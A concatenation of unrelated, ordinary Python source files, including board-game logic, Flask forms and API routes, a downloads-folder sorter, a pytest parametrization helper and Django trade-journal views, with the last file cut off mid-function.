def others_place_brick(brick_idx):
    """Replay a tile placement made by another (remote) player.

    Mirrors place_brick() but takes a board index directly, then applies
    the placement's local consequence (found/expand/merge/discard).
    """
    brick_coord = idx2coord(brick_idx)
    brick_display = brick_coord[0]*10+brick_coord[1]
    variables.BRICK_COLOR[brick_idx]=-2
    variables.ON_BOARD_NUM += 1
    variables.BLANK_BLOCK_NUM-=1
    variables.MY_LOG+="%s放置了T%s\n" %(variables.PLAYER_NAME[variables.TURN],brick_display)
    cnt = detect_connection(brick_idx)
    if cnt==-1:
        # Isolated tile: nothing further happens.
        pass
    elif cnt==0: #single
        # Touches lone tiles only: wait for the remote player's choice.
        variables.MY_LOG+="等待%s选择建立的公司\n" %(variables.PLAYER_NAME[variables.TURN])
    elif cnt==1: #expand
        expand(brick_idx)
    elif cnt==2: #acquire
        c1,c2 = acquire_list(brick_idx)
        if variables.COMPANY_SIZE[c1]>=2 and variables.COMPANY_SIZE[c2]>=2: #safe company
            # Both chains are safe: the tile is unplayable and discarded.
            desert(brick_idx)
            variables.MY_LOG+="均为安全公司,废弃地块%s\n" %(idx2str(brick_idx))
        else:
            variables.MY_LOG+="进行并购操作\n"
    elif cnt==3: #desert
        # Three companies adjacent: tile cannot be played, discard it.
        desert(brick_idx)
        variables.MY_LOG+="废弃地块\n"
def others_buy_stock(buy_stock_list):
    """Apply another player's stock purchase to the shared game state.

    Deducts the total cost from the current player's money, moves shares
    from the bank to the player, logs each non-zero purchase, and finally
    recomputes the major/minor holder table.

    :param buy_stock_list: shares bought per company (one entry per
        company, 7 in total).
    """
    variables.MONEY[variables.TURN] -= buy_cost(buy_stock_list)
    variables.MY_LOG += "%s购买了" % (variables.PLAYER_NAME[variables.TURN])
    # enumerate() instead of range(len(...)): same order, clearer intent.
    for company, amount in enumerate(buy_stock_list):
        variables.STOCK_AT_HAND[variables.TURN][company] += amount
        variables.COMPANY_STOCK_NUM[company] -= amount
        if amount != 0:
            variables.MY_LOG += "%s股%s, " % (amount, COMPANY_NAME[company])
    variables.MY_LOG += "\n"
    major_minor()
def ohters_new_brick(brick_idx):
    """Remove a tile another player drew from the shared pool.

    (The "ohters" typo in the name is kept -- remote callers use it.)
    """
    variables.REMAINING_BLOCK.remove(brick_idx)
    variables.REMAINING_BLOCK_NUM -= 1
def calculate_property(): #money+share+stock
    """Compute each player's total wealth and the final ranking.

    Wealth = cash + market value of held stock + the merger bonuses that
    would be paid out if every company were liquidated now.  The ranking
    (player indices, richest first) is stored in FINAL_RANKING.
    """
    variables.TOTAL_PROPERTY=[0,]*variables.NUM_PLAYER
    for i in range(variables.NUM_PLAYER):
        variables.TOTAL_PROPERTY[i]+=variables.MONEY[i] #money
        for j in range(7): #stock
            variables.TOTAL_PROPERTY[i]+=variables.STOCK_AT_HAND[i][j]*variables.COMPANY_PRICE[j]
    # Hypothetical liquidation bonus per company (same scheme as acquire()).
    for k in range(7): #share
        company_stock_list = [stock[k] for stock in variables.MAJOR_MINOR]
        large_num = company_stock_list.count(2)
        small_num = company_stock_list.count(1)
        if small_num==0: #common major or only one major
            # Majors split a 15x-price bonus, rounded down to 100s.
            share = 15*variables.COMPANY_PRICE[k]
            for i in range(variables.NUM_PLAYER):
                if variables.MAJOR_MINOR[i][k]==2:
                    ma_share = share//100//large_num*100
                    variables.TOTAL_PROPERTY[i]+=ma_share
                    # variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
        else:
            # Majors split 10x price, minors split 5x price.
            l_share = 10*variables.COMPANY_PRICE[k]
            s_share = 5*variables.COMPANY_PRICE[k]
            for i in range(variables.NUM_PLAYER):
                if variables.MAJOR_MINOR[i][k]==2:
                    ma_share = l_share//100//large_num*100
                    variables.TOTAL_PROPERTY[i]+=ma_share
                    # variables.MY_LOG+="%s作为大股东获得分红%s\n" %(variables.PLAYER_NAME[i],ma_share)
                elif variables.MAJOR_MINOR[i][k]==1:
                    mi_share = s_share//100//small_num*100
                    variables.TOTAL_PROPERTY[i]+=mi_share
                    # variables.MY_LOG+="%s作为二股东获得分红%s\n" %(variables.PLAYER_NAME[i],mi_share)
    sorted_property = sorted(enumerate(variables.TOTAL_PROPERTY), key=lambda x: x[1],reverse=True)
    variables.FINAL_RANKING = [i[0] for i in sorted_property]
def check_final():
    """Return 1 (and set win_flag) when the game is over, else 0.

    The game ends when any company reaches the maximum-size threshold or
    when all 7 companies are safe (size >= 2).
    """
    safe_companies = 0
    for idx in range(len(COMPANY_NAME)):
        size = variables.COMPANY_SIZE[idx]
        if size >= 3:        # max-size threshold reached
            variables.win_flag = True
            return 1
        if size >= 2:        # safe: can no longer be acquired
            safe_companies += 1
    if safe_companies == 7:  # every company is safe -> game over
        variables.win_flag = True
        return 1
    return 0
from flask.ext.wtf import Form
from wtforms.fields import BooleanField, DateField, HiddenField, \
PasswordField, SelectField, TextField
from wtforms.validators import InputRequired, Length, Required, Email, \
EqualTo, Optional
class LoginForm(Form):
    """Sign-in form: e-mail + password, with an optional "remember me"
    checkbox for a persistent session."""
    email = TextField('Email Address', validators=[Required(), Email()])
    password = PasswordField('Password', validators=[Required()])
    remember = BooleanField('Remember Me')
class UserInfoForm(Form):
    """Profile-editing form for an existing employee.

    The hidden ``id`` carries the record being edited.  ``password`` only
    needs to match ``confirm`` (EqualTo); ``confirm`` itself has no
    validators, so leaving both blank keeps the current password.
    """
    id = HiddenField('Employee ID', validators=[Required()])
    fullName = TextField('Full Name', validators=[Required()])
    # Choices are expected to be populated by the view before rendering.
    position = SelectField('Position', coerce=int,
                           validators=[Optional()])
    email = TextField('Email Address', validators=[Required(), Email()])
    password = PasswordField(
        'New Password',
        validators=[EqualTo('confirm', message='Passwords must match.')])
    confirm = PasswordField('Repeat Password')
class UserPermForm(Form):
    """Permission-editing form: access level plus moderator/roster flags.

    The boolean labels are intentionally empty -- the template renders
    its own captions next to the checkboxes.
    """
    id = HiddenField('Employee ID', validators=[Required()])
    access = SelectField('Access Level', coerce=int,
                         validators=[Required()])
    moderator = BooleanField('')
    roster = BooleanField('')
class BusinessForm(Form):
    """Create/edit form for a business record and its contact agent."""
    id = HiddenField('Business ID', validators=[Required()])
    # No validators: any coercible int is accepted for the record type.
    type = SelectField('Record Type', coerce=int)
    name = TextField('Registered Name', validators=[Required()])
    contact = TextField('Agent Name', validators=[Required()])
    phone = TextField('Phone Number', validators=[Required()])
class DocumentForm(Form):
    """Form for a document attached to a business record.

    ``expiry`` must be entered as month/day/year (e.g. 12/31/2024).
    """
    id = HiddenField('Document ID', validators=[Required()])
    bizId = HiddenField('Business ID', validators=[Required()])
    type = SelectField('Record Type', coerce=int, validators=[Optional()])
    expiry = DateField('Expiry Date', format='%m/%d/%Y',
                       validators=[Required()])
|
def zig_zag(arr):
    """Rearrange `arr` in place into a zig-zag: a < b > c < d > ...

    Single left-to-right pass: the expected relation between adjacent
    elements alternates, and a swap restores it whenever it is violated.

    :param arr: list of comparable items (mutated in place).
    :return: the same list.
    """
    expect_less = True  # True: arr[i] < arr[i+1] expected; False: '>'
    for i in range(len(arr) - 1):
        if expect_less:
            if arr[i] >= arr[i + 1]:
                arr[i], arr[i + 1] = arr[i + 1], arr[i]
        else:
            if arr[i] <= arr[i + 1]:
                arr[i], arr[i + 1] = arr[i + 1], arr[i]
        expect_less = not expect_less
    return arr
# Demo run.  Bug fix: the bare "print zig_zag(a)" statement is a
# SyntaxError on Python 3; print(zig_zag(a)) works on both Python 2
# (parenthesised expression) and Python 3 (function call).
a = [9, 6, 1, 7, 5, 2, 3]
print(zig_zag(a))
import numpy as np
import cv2
import sys
import os
import pylab
from poisson_tools import image_to_poisson_trains
from util_functions import *
def img_to_spike_array( img_file_name, save_as_pickle=True ):
    """Convert a grayscale image into Poisson spike trains and plot them.

    Relies on the module-level globals ``max_freq``, ``on_duration`` and
    ``off_duration`` being assigned before the call (they are set in the
    ``__main__`` block below); the function has no defaults of its own.

    :param img_file_name: path to the image file (read as grayscale).
    :param save_as_pickle: when True, pickle the spike array to
        ``spike_array_<basename>`` in the current working directory.
    """
    img = cv2.imread( img_file_name, cv2.IMREAD_GRAYSCALE )
    if img is not None:
        height, width = img.shape
        # Flatten to a single row vector: the converter expects one
        # image per row.
        spikes = image_to_poisson_trains( np.array( [img.reshape(height*width)] ), # notice reshape
                                          height, width,
                                          max_freq, on_duration, off_duration )
        # Show a raster plot of the generated trains (blocks until the
        # window is closed).
        pylab.figure()
        raster_plot_spike( spikes )
        pylab.show()
        #--- Pickle the spike array for further use -------------------------------------------#
        if save_as_pickle:
            # Strip the directory and extension to build the pickle name.
            img_file_name = img_file_name[ img_file_name.rfind('/')+1 : img_file_name.rfind('.') ]
            pickle_file = "spike_array_{}".format( img_file_name )
            pickle_it( spikes, pickle_file )
    else:
        print( "Image couldn't be read! -> from file ({}) to ({})".format( img_file_name, img ) )
if __name__ == '__main__':
    # CLI: either just an image/directory path (defaults below), or the
    # path plus explicit max_freq / on_duration / off_duration values.
    if len( sys.argv ) != 2 and len( sys.argv ) != 5:
        print( "Usage:" )
        print( "\t python convert_image_to_spike_array.py <img_file_name> <max_freq> <on_duration> <off_duration>" )
        print( "or (with the default values for up to a 32x32 image {max_freq=1000} {on_duration=200} {off_duration=100}):" )
        print( "\t python convert_image_to_spike_array.py <img_file_name>" )
    else:
        img_file_name = sys.argv[1]
        # These three become module-level globals read by
        # img_to_spike_array().
        if len( sys.argv ) > 2:
            max_freq = int(sys.argv[2]) # Hz
            on_duration = int(sys.argv[3]) # ms
            off_duration = int(sys.argv[4]) # ms
        else:
            max_freq = 1000 # Hz
            on_duration = 200 # ms
            off_duration = 100 # ms
        print( "max_freq: {}".format( max_freq ) )
        print( "on_duration: {}".format( on_duration ) )
        print( "off_duration: {}".format( off_duration ) )
        if os.path.isdir( img_file_name ):
            # Directory argument: convert every .png found recursively.
            import glob2  # third-party; only needed for the directory case
            image_list = glob2.glob( os.path.join( img_file_name, "**/*.png" ) )
            for img in image_list:
                if os.path.isfile( img ):
                    img_to_spike_array( img )
        elif os.path.isfile( img_file_name ):
            img_to_spike_array( img_file_name )
|
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    def removeNthFromEnd(self, head, n):
        """
        :type head: ListNode
        :type n: int
        :rtype: ListNode
        """
        # Collect every node so the (size-n)-th one can be addressed
        # directly.
        nodes = []
        node = head
        while node is not None:
            nodes.append(node)
            node = node.next
        length = len(nodes)
        # Removing the head itself (or beyond): the result simply starts
        # at head.next.
        if n >= length:
            return head.next
        # Bypass the n-th node from the end by relinking its predecessor.
        # (Indexing mem[length-n] is safe; mem[length-n+1] might not be.)
        nodes[length - n - 1].next = nodes[length - n].next
        return head
|
from keras.preprocessing.image import ImageDataGenerator
import logging
import pickle
import numpy as np
from keras.utils import np_utils
from ibmfl.data.data_handler import DataHandler
logger = logging.getLogger(__name__)
class MnistTFDataHandler(DataHandler):
    """
    Data handler for the MNIST dataset stored as pickled (x, y) tuples.
    """
    def __init__(self, data_config=None, channels_first=False):
        """
        :param data_config: optional dict with 'train_file' and
            'test_file' paths to the pickled datasets.
        :param channels_first: accepted for interface compatibility but
            unused; the channel axis is always appended last.
        """
        super().__init__()
        self.file_name = None
        if data_config is not None:
            if 'train_file' in data_config:
                self.train_file_name = data_config['train_file']
            if 'test_file' in data_config:
                self.test_file_name = data_config['test_file']
    def get_data(self, nb_points=500):
        """
        Load and pre-process the MNIST training and testing data.

        Pixel values are scaled to [0, 1]; the labels are left as class
        ids (bug fix: they were previously also divided by 255, which
        destroys them).  A trailing channel axis is added to the images.

        :param nb_points: unused; kept for interface compatibility.
        :type nb_points: `int`
        :return: ((x_train, y_train), (x_test, y_test))
        :rtype: `tuple`
        :raises IOError: if either pickle file cannot be loaded.
        """
        try:
            logger.info(
                'Loaded training data from ' + str(self.train_file_name))
            # Context managers guarantee the files are closed on error.
            with open(self.train_file_name, 'rb') as f:
                (x_train, y_train) = pickle.load(f)
            logger.info(
                'Loaded test data from ' + str(self.test_file_name))
            with open(self.test_file_name, 'rb') as f:
                (x_test, y_test) = pickle.load(f)
            # Scale pixels to [0, 1]; labels must NOT be rescaled.
            x_train = x_train / 255.0
            x_test = x_test / 255.0
        except Exception:
            raise IOError('Unable to load training data from path '
                          'provided in config file: ' +
                          self.train_file_name)
        # Add a trailing channel dimension: (N, 28, 28) -> (N, 28, 28, 1).
        # np.newaxis is the same object as tf.newaxis (None), so this
        # avoids importing tensorflow just for the reshape.
        x_train = x_train[..., np.newaxis]
        x_test = x_test[..., np.newaxis]
        print('x_train shape:', x_train.shape)
        print(x_train.shape[0], 'train samples')
        print(x_test.shape[0], 'test samples')
        return (x_train, y_train), (x_test, y_test)
|
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from datetime import datetime
import os
import time
# Extension -> destination classification tables for the downloads sorter.
image_extensions = ('.png', '.jpg', '.jpeg', '.svg', '.tiff')
video_extensions = ('.mov', '.mp4', '.mkv', '.avi', '.webm', '.mpeg', '.mpg', '.mpe',
                    '.mp2', '.ogg', '.wmv', '.mpv', '.m4p', '.m4v', '.qt', '.flv', '.swf', '.avchd')
installer_extensions = ('.exe', '.msi', '.dmg', '.pkg', '.deb')
audio_extensions = ('.mp3', '.m4a', '.wav', '.aiff',
                    '.acc', '.ogg', '.wma', '.flac', '.alac')
# Trailing comma is required: ('.pdf') is just a parenthesized string, and
# `ext in '.pdf'` would also match substrings like '.pd'.
pdfs_extensions = ('.pdf',)
folder_to_track = '/Users/sergi/Downloads'
generic_folder_destination = '/Users/sergi/Documents/other'
images_folder_destination = '/Users/sergi/Pictures'
videos_folder_destination = '/Users/sergi/Movies'
audios_folder_destination = '/Users/sergi/Music'
installers_folder_destination = '/Users/sergi/Documents/installers'
pdfs_folder_destination = '/Users/sergi/Documents/pdfs'
log_file = '/Users/sergi/Documents/startup/downloads_automation_log.txt'
def date_time():
    """Return the current local time formatted as 'dd/mm/YYYY HH:MM:SS'."""
    return datetime.now().strftime('%d/%m/%Y %H:%M:%S')
def print_to_log(message):
    """Append *message* followed by a newline to the global log file."""
    # 'with' guarantees the handle is closed even if the write raises.
    with open(log_file, 'a+') as f:
        f.write(message + '\n')
def get_file_name(path):
    """Return *path* stripped of its extension (everything before the last dot)."""
    root, _ = os.path.splitext(path)
    return root
def get_file_extension(path):
    """Return the extension of *path* including the leading dot ('' if none)."""
    return os.path.splitext(path)[-1]
def check_file_exists(path):
    """Return True when *path* exists on disk (file or directory)."""
    return os.path.exists(path)
def check_file_completed(path):
    """Return True once *path* looks fully downloaded.

    Browser temp extensions mean the download is still running, so report
    False after a short pause and let the caller rescan.  Otherwise poll the
    size until it stops growing between checks.
    """
    in_progress = ('.crdownload', '.download', '.part', '.partial')
    ext = get_file_extension(path)
    if ext in in_progress:
        print('Download extension detected:' + ext)
        time.sleep(2)
        print('Checking again if the extension has changed')
        return False
    previous_size = -1
    while previous_size != os.path.getsize(path):
        if previous_size != -1:
            print(path + ' -- Waiting for the file to be complete')
        previous_size = os.path.getsize(path)
        time.sleep(2)
    print(path + ' -- File ready to be moved')
    return True
def get_new_destination(path, filename, destination):
    """Return a destination path that does not collide with an existing file.

    If *destination* is free it is returned unchanged; otherwise ' (N)' is
    inserted before the extension, with N starting at 2.
    """
    if not check_file_exists(destination):
        print('Destination: ' + destination)
        return destination
    counter = 1
    print('File exists on the destination folder, giving it a new name')
    while True:
        counter += 1
        candidate = '{} ({}){}'.format(
            get_file_name(destination), counter, get_file_extension(destination))
        if not check_file_exists(candidate):
            print('New name: ' + candidate)
            return candidate
def destination(path, filename):
    """Map *filename* to its target path based on its extension.

    Returns '' for in-progress '.download' files so the caller skips them;
    anything unrecognised goes to the generic folder.
    """
    folder = generic_folder_destination
    if os.path.isfile(path):
        ext = get_file_extension(filename)
        if ext == '.download':
            check_file_completed(filename)
            return ''
        if ext in image_extensions:
            folder = images_folder_destination
        elif ext in video_extensions:
            folder = videos_folder_destination
        elif ext in audio_extensions:
            folder = audios_folder_destination
        elif ext in installer_extensions:
            folder = installers_folder_destination
        elif ext in pdfs_extensions:
            folder = pdfs_folder_destination
    return folder + '/' + filename
def move_files():
    """Sort every non-hidden file in the tracked folder into its destination."""
    files = os.listdir(folder_to_track)
    # omit hidden files
    filtered_files = [x for x in files if not x.startswith('.')]
    for filename in filtered_files:
        src = folder_to_track + '/' + filename
        if not check_file_completed(src):
            # File still downloading: restart the whole scan from scratch.
            # NOTE(review): this recursion has no depth bound — a download
            # that never completes would recurse indefinitely; confirm.
            move_files()
            break
        new_destination = destination(src, filename)
        # Resolve name collisions in the destination folder.
        new_destination = get_new_destination(src, filename, new_destination)
        print(date_time() + ' Moving ' +
              src + ' to ' + new_destination)
        print_to_log(date_time() + ' Moving ' +
                     src + ' to ' + new_destination)
        os.rename(src, new_destination)
class MyHandler(FileSystemEventHandler):
    """Watchdog handler: re-sort the tracked folder on any modification event."""
    def on_modified(self, event):
        # Any change in the folder (new download, rename, ...) triggers a rescan.
        move_files()
# Wire the handler to the Downloads folder and start watching in the background.
event_handler = MyHandler()
observer = Observer()
observer.schedule(event_handler, folder_to_track, recursive=True)
observer.start()
# Initial pass so files already present are sorted before any event fires.
move_files()
try:
    # Keep the main thread alive; the observer runs on its own thread.
    while True:
        time.sleep(1)
except KeyboardInterrupt:
    # Ctrl-C: stop the watcher, then wait for its thread to finish below.
    observer.stop()
observer.join()
|
import struct
def spliter(format, buffer):
    """Unpack one struct *format* from the head of *buffer*.

    Returns ``(values, remainder)`` where *values* is the unpacked tuple
    (collapsed to the single value when the format yields exactly one field)
    and *remainder* is the unconsumed tail of *buffer*.
    """
    # calcsize was computed twice before; unpack_from avoids slicing a copy
    # of the head just to unpack it.
    size = struct.calcsize(format)
    values = struct.unpack_from(format, buffer)
    if len(values) == 1:
        values = values[0]
    return values, buffer[size:]
from datetime import datetime
from flask import (
abort,
Blueprint,
jsonify,
request,
Response,
send_from_directory,
)
import config
from models import (
Comment,
db,
Post,
)
# Single blueprint holding every route in this module, mounted at the root.
api = Blueprint('api', __name__, url_prefix="")
@api.route('/')
def home():
    """Landing endpoint; returns a plain-text greeting."""
    return "You are in my home page"
@api.route('/<filename>')
def serve_file(filename):
    """Serve an uploaded file from the upload folder by name."""
    # No favicon is shipped; treat browser favicon probes (and empty names)
    # the same way: not found.
    if filename == 'favicon.ico' or not filename:
        abort(404)
    return send_from_directory(config.UPLOAD_FOLDER, filename)
@api.route('/posts', methods=['GET', 'POST'])
def posts():
    """List all posts (GET) or create a new post from an uploaded file (POST)."""
    if request.method == 'GET':
        ordered = Post.query.order_by(Post.timestamp_creation.desc())
        return jsonify({'posts': [p.to_dict(extended=True) for p in ordered]})
    # POST: file-upload handling, after
    # https://flask.palletsprojects.com/en/1.1.x/patterns/fileuploads/
    if 'file' not in request.files:
        abort(Response("Missing file", 400))
    upload = request.files['file']
    if upload.filename == '':
        abort(Response("Empty filename", 400))
    stored_name = Post.add_file(upload)
    post = Post(timestamp_creation=datetime.now(), filename=stored_name)
    db.session.add(post)
    db.session.commit()
    db.session.refresh(post)  # To have the id of the newly created object
    return jsonify(post.to_dict())
@api.route('/posts/<int:id_post>', methods=['PUT', 'DELETE'])
def posts_id(id_post):
    """Replace a post's file (PUT) or delete the post entirely (DELETE)."""
    post = Post.query.get_or_404(id_post)
    if request.method == 'PUT':
        if 'file' not in request.files:
            abort(Response("Missing file", 400))
        upload = request.files['file']
        if upload.filename == '':
            abort(Response("Empty filename", 400))
        # Swap the stored file, then point the row at the new name.
        Post.delete_file(post.filename)
        post.filename = Post.add_file(upload)
        db.session.commit()
        db.session.refresh(post)
        return jsonify(post.to_dict())
    # DELETE
    db.session.delete(post)
    db.session.commit()
    return ('', 200)
@api.route('/posts/<int:id_post>/comments', methods=['POST'])
def posts_id_comments(id_post):
    """Attach a new comment to the post with id *id_post*."""
    # 404s early if the post does not exist.
    post = Post.query.get_or_404(id_post)
    body = request.json
    if not body:
        abort(Response('Empty body', 400))
    text = body.get('comment')
    if not text:
        abort(Response('Missing comment body', 400))
    comment = Comment(comment=text, related_post=post.id, timestamp_creation=datetime.now())
    db.session.add(comment)
    db.session.commit()
    db.session.refresh(comment)  # To have the id of the newly created object
    return jsonify(comment.to_dict())
@api.route('/comments/<int:id_comment>', methods=['PUT', 'DELETE'])
def comments_id(id_comment):
    """Edit a comment's text (PUT) or delete it (DELETE)."""
    comment = Comment.query.get_or_404(id_comment)
    if request.method == 'PUT':
        # Keep the old text when the request omits 'comment'.
        payload = request.json
        comment.comment = payload.get('comment', comment.comment)
        db.session.commit()
        db.session.refresh(comment)
        return jsonify(comment.to_dict())
    db.session.delete(comment)
    db.session.commit()
    return ('', 200)
|
import functools
import inspect
import os
from glob import glob
from random import shuffle
from types import GeneratorType
from typing import TextIO
from _pytest.python import Metafunc
from loguru import logger
from pytest_cleanup.common import (
get_class_that_defined_method,
mergeFunctionMetadata,
is_async_fn,
try_load_dill,
pytestcleanup_decorated_with_record_test_data,
get_name,
)
from pytest_cleanup.constants import test_data_directory
def deserialise(f):
    """Deserialise the open text handle *f* via the JSON backend."""
    return deserialise_json(f)
def deserialise_json(f: TextIO):
    """Read all of *f* and decode it with jsonpickle."""
    import jsonpickle
    return jsonpickle.loads(f.read())
def transform_function(f):
    """Wrap *f* so recorded test cases can replay it uniformly.

    The wrapper strips a leading ``cls`` argument when replaying classmethods
    and materialises generator results as lists so they can be compared.
    """
    # Already wrapped: return as-is (idempotent decoration).
    if getattr(f, pytestcleanup_decorated_with_record_test_data, False):
        # raise Exception('Already decorated')
        return f
    clazz = get_class_that_defined_method(f)
    arg_signature = inspect.getfullargspec(f).args
    # Heuristic: a classmethod-style callable declares 'cls' first.
    is_cls_function = clazz and arg_signature and arg_signature[0] == 'cls'
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        if is_cls_function:
            # NOTE(review): relies on and/or precedence — true when args is
            # empty OR the first positional arg is not an instance of clazz;
            # confirm this matches the recorder's calling convention.
            first_arg_is_cls = len(args) and not isinstance(list(args)[0], clazz) or not len(args)
            if first_arg_is_cls:
                args = remove_first_argument(args)
        return_value = f(*args, **kwargs)
        if isinstance(return_value, GeneratorType):
            # generators aren't really comparable, so we compare lists instead
            return list(return_value)
        return return_value
    def remove_first_argument(args):
        # Drop the injected cls argument before the real call.
        return tuple(list(args)[1:])
    # Marker attribute checked at the top to avoid double decoration.
    wrapper.pytestcleanup_decorated_with_record_test_data = True
    return wrapper
def deserialise_from_file(filename):
    """Load and deserialise *filename*; log and return None on failure."""
    with open(filename, 'r') as f:
        try:
            return deserialise(f)
        except Exception as e:
            # The original f-string had no placeholder, so the offending
            # path never appeared in the log; include it for traceability.
            logger.error(f'Error loading data file {filename}')
            logger.error(e)
def load_data_file(filename, is_async):
    """Load one recorded-test-case JSON file and prepare it for parametrize.

    Returns ``(module, clazz, test_cases)`` where each test case is
    ``(wrapped_fn, args, kwargs, expected)``, or None when the file does not
    match the requested sync/async flavour or cannot be used.
    """
    data = deserialise_from_file(filename)
    if not data:
        return
    fn = data['function']
    # Skip files whose flavour does not match the caller's request.
    if (is_async and not is_async_fn(fn)) or (not is_async and is_async_fn(fn)):
        return
    # NOTE(review): this None-check runs after is_async_fn(fn) above —
    # confirm is_async_fn tolerates a fn that failed to load.
    if not fn:
        logger.warning(f'Function was not properly loaded from (unknown)')
        return
    module = data['module']
    function_name = fn.__name__
    clazz = data['class']
    class_or_module = clazz or module
    if not class_or_module:
        # can happen if user loaded std lib modules
        return
    # raise Exception(f'no class or module found for (unknown)')
    # Re-resolve the live attribute so we wrap the current definition.
    fn = getattr(class_or_module, function_name)
    new_item = mergeFunctionMetadata(fn, transform_function(fn))
    return (
        module,
        clazz,
        [
            (new_item, try_load_dill(x['args']), try_load_dill(x['kwargs']), edit_return_value(x['return_value']))
            for x in data['test_cases']
        ],
    )
def edit_return_value(return_value):
    """Undo dill wrapping and materialise iterator results as plain lists."""
    from _collections_abc import list_iterator
    value = try_load_dill(return_value)
    # jsonpickle serialises generators as "list iterators"; lists compare sanely.
    return list(value) if isinstance(value, list_iterator) else value
def parametrize_stg_tests(metafunc: Metafunc):
    """Dispatch parametrisation to the async or sync variant by test name."""
    name = metafunc.definition.name
    if name == 'test_pytest_cleanup_async_test_cases':
        _parametrize_stg_tests(metafunc, is_async=True)
    if name == 'test_pytest_cleanup_sync_test_cases':
        _parametrize_stg_tests(metafunc, is_async=False)
def _parametrize_stg_tests(metafunc: Metafunc, is_async):
    """Collect recorded test cases from disk and parametrize *metafunc*.

    Walks ``test_data_directory/*/**/*.json``, loads each file, and feeds
    ``(fn, args, kwargs, expected)`` tuples to ``metafunc.parametrize``.
    """
    sep = os.sep
    path_list = list(sorted(glob(f'{test_data_directory}{sep}*{sep}**{sep}*.json', recursive=True)))
    all_test_data = []
    all_ids = []
    for data_file_path in path_list:
        split = data_file_path.split(sep)
        # Directory layout puts the function name one level above the file.
        function_name = split[-2]
        try:
            tuple_result = load_data_file(data_file_path, is_async)
            if tuple_result:
                module, clazz, test_cases = tuple_result
            else:
                # Wrong sync/async flavour, or unusable file: skip it.
                continue
        except Exception as e:
            logger.error(f'Could not load data file {data_file_path}')
            logger.error(e)
            raise e
        module_name = get_name(module)
        class_name = get_name(clazz)
        # NOTE(review): this keeps only the module name when the two names
        # DIFFER and concatenates them when they are EQUAL — the condition
        # looks inverted; confirm against get_name's behaviour.
        class_or_module_name = module_name if module_name != class_name else f'{module_name}.{class_name}'
        ids = [f'{class_or_module_name}-{function_name}'] * len(test_cases)
        all_test_data.extend(test_cases)
        all_ids.extend(ids)
    metafunc.parametrize(['fn', 'args', 'kwargs', 'expected'], all_test_data, ids=all_ids)
|
from django.urls import include
from django.conf.urls import url
from rest_framework import routers
from .views import UserViewSet
# DefaultRouter generates the standard list/detail routes for the viewset.
router = routers.DefaultRouter()
router.register(r"user", UserViewSet, basename='user')
# Expose the router-generated patterns directly as this app's urlpatterns.
urlpatterns = router.urls
|
from django.shortcuts import render, get_object_or_404
from .forms import EntryForm
from .models import Trades
from user.models import Profile
from django.http import HttpResponseRedirect, HttpResponse, JsonResponse
from django.views.generic.edit import UpdateView
import datetime
from django.urls import reverse
import csv
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from django.db.models import F
import decimal
@login_required
def index(request):
    """Render the trade journal page with the user's trades and an entry form."""
    user_trades = Trades.objects.filter(user_id=request.user.id)
    return render(request, 'trades/index.html',
                  {'trades': user_trades, 'form': EntryForm()})
def trades(request):
    """Create a trade from the entry form (POST) or show a blank form (GET).

    On a valid POST the trade's PnL is computed, the user's account balance
    is adjusted, and the trade row is stored with the resulting balance.
    Any POST redirects back to the index (matching the original behaviour,
    even when the form is invalid).
    """
    if request.method == 'GET':
        form = EntryForm()
    elif request.method == 'POST':
        form = EntryForm(request.POST)
        pnl = 0
        success = False
        if form.is_valid():
            ticker = form.cleaned_data['ticker']
            position = form.cleaned_data['position']
            shares = form.cleaned_data['shares']
            entry_date = form.cleaned_data['entry_date']
            exit_date = form.cleaned_data['exit_date']
            entry_price = form.cleaned_data['entry_price']
            exit_price = form.cleaned_data['exit_price']
            entry_comments = form.cleaned_data['entry_comments']
            exit_comments = form.cleaned_data['exit_comments']
            # PnL: a long profits when price rises, a short when it falls.
            if position == 'Long':
                pnl = (float(exit_price) - float(entry_price)) * int(shares)
                if exit_price >= entry_price:
                    success = True
            elif position == 'Short':
                pnl = (float(entry_price) - float(exit_price)) * int(shares)
                if entry_price >= exit_price:
                    success = True
            success = 'success' if success else 'fail'
            # Apply the PnL at the DB level via an F-expression.
            Profile.objects.filter(user_id=request.user.id).update(
                account_balance=F("account_balance") + pnl)
            account_balance = Profile.objects.get(user=request.user).account_balance
            # create() already INSERTs; the original chained .save() on the
            # result, issuing a redundant second write.
            Trades.objects.create(
                user_id=request.user.id,
                ticker=ticker,
                position=position,
                shares=shares,
                entry_date=entry_date,
                exit_date=exit_date,
                entry_price=entry_price,
                exit_price=exit_price,
                pnl=pnl,
                entry_comments=entry_comments,
                exit_comments=exit_comments,
                success=success,
                account_balance=account_balance
            )
        return HttpResponseRedirect(reverse("trades:index"))
    return render(request, 'trades/form.html', {'form': form})
def delete_trade(request, pk):
    """Delete a trade and reverse its PnL effect on the user's balance."""
    if request.method == 'DELETE':
        trade = get_object_or_404(Trades, pk=pk)
        # Reversing a trade always means subtracting its PnL: removing a win
        # lowers the balance; removing a loss (negative pnl) raises it.  The
        # original *added* a negative pnl, double-counting the loss.
        new_balance = decimal.Decimal(trade.account_balance) - decimal.Decimal(trade.pnl)
        # NOTE(review): this restores the balance snapshot stored on the
        # trade row, not the profile's current balance — confirm intended.
        Profile.objects.filter(user=request.user).update(account_balance=new_balance)
        trade.delete()
    return HttpResponse(status=200)
def update_trade(request):
    """Update an existing trade from POSTed fields and recompute its PnL."""
    if request.method == 'POST':
        pk = request.POST.get('pk')
        ticker = request.POST.get('ticker')
        position = request.POST.get('position')
        shares = request.POST.get('shares')
        entry_date = datetime.datetime.strptime(request.POST.get('entry_date'), '%m/%d/%y').date()
        exit_date = datetime.datetime.strptime(request.POST.get('exit_date'), '%m/%d/%y').date()
        entry_price = request.POST.get('entry_price')
        exit_price = request.POST.get('exit_price')
        entry_comments = request.POST.get('entry_comments')
        exit_comments = request.POST.get('exit_comments')
        pnl = 0
        success = False
        # POST values are strings: compare prices numerically.  The original
        # compared the raw strings, so '9.5' >= '10.0' evaluated True.
        entry_val = float(entry_price)
        exit_val = float(exit_price)
        if position == 'Long':
            pnl = (exit_val - entry_val) * int(shares)
            success = exit_val >= entry_val
        elif position == 'Short':
            pnl = (entry_val - exit_val) * int(shares)
            success = entry_val >= exit_val
